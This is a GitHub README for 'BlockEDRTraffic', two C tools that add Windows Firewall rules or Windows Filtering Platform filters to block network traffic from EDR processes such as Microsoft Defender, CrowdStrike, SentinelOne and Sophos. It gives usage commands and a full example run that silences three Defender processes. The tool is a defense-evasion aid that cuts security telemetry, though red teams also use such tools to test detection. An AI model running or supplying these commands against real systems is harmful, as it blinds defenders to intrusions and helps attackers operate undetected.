Skip to content

0xJs/BlockEDRTraffic

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

7 Commits
WindowsDefenderFirewall
WindowsDefenderFirewall
 
 
WindowsFilteringPlatform
WindowsFilteringPlatform
 
 
.gitignore
.gitignore
 
 
BlockTraffic.sln
BlockTraffic.sln
 
 
README.md
README.md
 
 

Repository files navigation

Blocking EDRs traffic

Two tools written in C that block network traffic for blacklisted EDR processes, using either Windows Defender Firewall (WDF) or Windows Filtering Platform (WFP).

Overview

  • WindowsDefenderFirewall.exe
    • Creates inbound and outbound block rules in Windows Defender Firewall for blacklisted EDR processes.
  • WindowsFilteringPlatform.exe
    • Creates WFP filters that block traffic for blacklisted EDR processes. Includes a custom AppID resolution routine to obtain executable identities.
  • Both tools:
    • Verify the process is running with High Integrity and SeDebugPrivilege enabled.
    • Enumerate running processes and match them against a blacklist.
    • Support a cleanup mode that removes only the rules/filters created by these PoCs.
  • These tools do not disable or tamper with security products; they create network block rules/filters referencing targeted executables.

How it works (high level)

  • Privilege checks: Ensures elevated integrity level and SeDebugPrivilege to enumerate processes and configure firewall/WFP.
  • Process discovery: Enumerates running processes and resolves full image paths for blacklist matching.
  • Blocking:
    • WDF: Adds per-app inbound/outbound block rules via the Windows Firewall COM API.
    • WFP: Adds per-app IPv4/IPv6 block filters via the WFP engine.

Supported EDRs

Currently supported EDRs and their processes include:

  • Microsoft Defender Antivirus
  • Microsoft Defender for Endpoint
  • Elastic EDR
  • BitDefender
  • Cortex
  • CrowdStrike
  • Sentinel
  • Sophos

Will add more when I get to test them. The process definitions are listed in process.c, making it easy to extend the blacklist with new entries. I haven’t fully validated blocking of telemetry being send towards the SIEM/Dashboard, but I did confirm process names from installed components.

Usage

  • Compile it using Visual Studio 2022

WindowsDefenderFirewall.exe

  • Use the -e parameter to block all EDR processes
PS C:\ > .\WindowsDefenderFirewall.exe
Usage: WindowsDefenderFirewall.exe -e / -d
Options:
   -e Enable  - Block blacklisted EDR processes
   -d Disable - Remove blocked firewall rules created by this tool
   -h         - Display this help message

WindowsFilteringPlatform.exe

  • Use the --edr parameter to block all EDR processes
  • Use the -e parameter to block a specific process
PS C:\ > .\WindowsFilteringPlatform.exe
Usage: WindowsFilteringPlatform.exe -e / -d  / --edr
Options:
   --edr          - Block traffic of blacklisted EDR processes
   -e <PROCESS>   - Block traffic of specified process
   -d             - Remove blocked firewall rules created by this tool
   -h             - Display this help message

Common scenarios

  • Block all blacklisted EDR processes (WFP):
PS C:\> .\WindowsFilteringPlatform.exe --edr
  • Block a single process (WFP):
PS C:\> .\WindowsFilteringPlatform.exe -e MsMpEng.exe
  • Remove created rules/filters:
PS C:\> .\WindowsFilteringPlatform.exe -d
PS C:\> .\WindowsDefenderFirewall.exe -d

Example

PS C:\ > .\WindowsFilteringPlatform.exe --edr
[i] IsProcessHighIntegrity - Checking if current process is running in High Integrity
        OpenProcessToken - Retrieved handle to token 0x00000000000000AC
        GetTokenInformation1 - Retrieved 28 bytes of token information
        malloc - Allocated 28 bytes of memory at 0x0000026F0B871D60
        GetTokenInformation2 - Retrieved 28 bytes of token information at 0x0000026F0B871D60
        GetSidSubAuthority - Integrity Level: 0x3000
[+] IsProcessHighIntegrity - Process running in High Integrity

[i] BlockEDRTraffic - Blocking traffic of listed processes using Windows Filtering Platform
        GetModuleHandleW - Received handle to ntdll.dll 0x00007FFBCB420000
        GetProcAddress - Received address to NtQuerySystemInformation 0x00007FFBCB582F60
        NtQuerySystemInformation - Retrieved size in bytes for the system information: 292232
        HeapAlloc - Allocated 292232 bytes of memory for SystemProcessInformation at 0x0000026F0B879400
        NtQuerySystemInformation - Retrieved size in bytes of system information: 292232 at 0x0000026F0B879400
        HeapAlloc - Allocated 72 bytes of memory for the EDR process struct at 0x0000026F0B86ECC0
        OpenProcess - Opened handle to process "MpDefenderCoreService.exe" 0x00000000000000AC
        QueryFullProcessImageNameW - Retrieved full process path "\Device\HarddiskVolume3\ProgramData\Microsoft\Windows Defender\Platform\4.18.25070.5-0\MpDefenderCoreService.exe"
        OpenProcess - Opened handle to process "MsMpEng.exe" 0x00000000000000AC
        QueryFullProcessImageNameW - Retrieved full process path "\Device\HarddiskVolume3\ProgramData\Microsoft\Windows Defender\Platform\4.18.25070.5-0\MsMpEng.exe"
        OpenProcess - Opened handle to process "NisSrv.exe" 0x00000000000000AC
        QueryFullProcessImageNameW - Retrieved full process path "\Device\HarddiskVolume3\ProgramData\Microsoft\Windows Defender\Platform\4.18.25070.5-0\NisSrv.exe"
        EnumerateEDRProcesses - 3 EDR processes enumerated
                Matched EDR process: "MpDefenderCoreService.exe" with PID 4288 and full path "\device\harddiskvolume3\programdata\microsoft\windows defender\platform\4.18.25070.5-0\mpdefendercoreservice.exe"
                Matched EDR process: "MsMpEng.exe" with PID 4332 and full path "\device\harddiskvolume3\programdata\microsoft\windows defender\platform\4.18.25070.5-0\msmpeng.exe"
                Matched EDR process: "NisSrv.exe" with PID 9808 and full path "\device\harddiskvolume3\programdata\microsoft\windows defender\platform\4.18.25070.5-0\nissrv.exe"
[i] BlockTraffic - Looping through EDR processes and creating Windows Filtering Platform filters
        FwpmEngineOpen0 - Opened handle to WFP engine 0x0000026F0B87A680
        FwpmProviderCreateEnumHandle0 - Opened handle to WFP enum 0x0000026F0B87A140
        FwpmProviderEnum0 - Enumerated 15 objects
        FindProviderGUIDByDesc - Provider with description "Microsoft Windows WFP Built-in custom provider." found
        FwpmFilterAdd0 - Added IPV4 filter for "MpDefenderCoreService.exe" with ID 77392
        FwpmFilterAdd0 - Added IPV6 filter for "MpDefenderCoreService.exe" with ID 77393
        FwpmEngineOpen0 - Opened handle to WFP engine 0x0000026F0B87A680
        FwpmProviderCreateEnumHandle0 - Opened handle to WFP enum 0x0000026F0B87A230
        FwpmProviderEnum0 - Enumerated 15 objects
        FindProviderGUIDByDesc - Provider with description "Microsoft Windows WFP Built-in custom provider." found
        FwpmFilterAdd0 - Added IPV4 filter for "MsMpEng.exe" with ID 77394
        FwpmFilterAdd0 - Added IPV6 filter for "MsMpEng.exe" with ID 77395
        FwpmEngineOpen0 - Opened handle to WFP engine 0x0000026F0B87A680
        FwpmProviderCreateEnumHandle0 - Opened handle to WFP enum 0x0000026F0B879ED0
        FwpmProviderEnum0 - Enumerated 15 objects
        FindProviderGUIDByDesc - Provider with description "Microsoft Windows WFP Built-in custom provider." found
        FwpmFilterAdd0 - Added IPV4 filter for "NisSrv.exe" with ID 77396
        FwpmFilterAdd0 - Added IPV6 filter for "NisSrv.exe" with ID 77397
[+] BlockEDRTraffic - Windows Filtering Platform blocking filters for all processes have been created

PS C:\ > .\WindowsFilteringPlatform.exe -d
[i] IsProcessHighIntegrity - Checking if current process is running in High Integrity
        OpenProcessToken - Retrieved handle to token 0x00000000000000E0
        GetTokenInformation1 - Retrieved 28 bytes of token information
        malloc - Allocated 28 bytes of memory at 0x00000206BD931BB0
        GetTokenInformation2 - Retrieved 28 bytes of token information at 0x00000206BD931BB0
        GetSidSubAuthority - Integrity Level: 0x3000
[+] IsProcessHighIntegrity - Process running in High Integrity

[i] UnblockTraffic - Removing all Windows Filtering Platform rules with custom filter name "Default Outbound Block"
        FwpmEngineOpen0 - Opened handle to WFP engine 0x00000206BD93A470
        FwpmFilterCreateEnumHandle0 - Opened handle to enumerate filters 0x00000206BD939E90
        FwpmFilterDeleteById0 - Deleted filter "Default Outbound Block" with ID 77397
        FwpmFilterDeleteById0 - Deleted filter "Default Outbound Block" with ID 77394
        FwpmFilterDeleteById0 - Deleted filter "Default Outbound Block" with ID 77393
        FwpmFilterDeleteById0 - Deleted filter "Default Outbound Block" with ID 77392
        FwpmFilterDeleteById0 - Deleted filter "Default Outbound Block" with ID 77396
        FwpmFilterDeleteById0 - Deleted filter "Default Outbound Block" with ID 77395
[+] UnblockTraffic - Windows Filtering Platform filters have been removed

Credits

I got inspired to expand upon the tools provided in the Evasion Lab (CETP from Altered Security), taught by Saad Ahla.

The EDRSilencer project.

Features ideas

  • Block a specific executable on disk (Not process)
  • Block all executables in a specific directory
  • Block a specific IP-address or URL (Is wildcard possible?)
  • Block a list of IP-addresses or URL's
  • Remotely apply WFP Filters?

About

Two tools written in C that block network traffic for blacklisted EDR processes, using either Windows Defender Firewall (WDF) or Windows Filtering Platform (WFP).

Resources

Readme
Activity

Stars

264 stars

Watchers

2 watching

Forks

33 forks
Report repository

Releases

No releases published

Packages

 
 
 

Contributors

Languages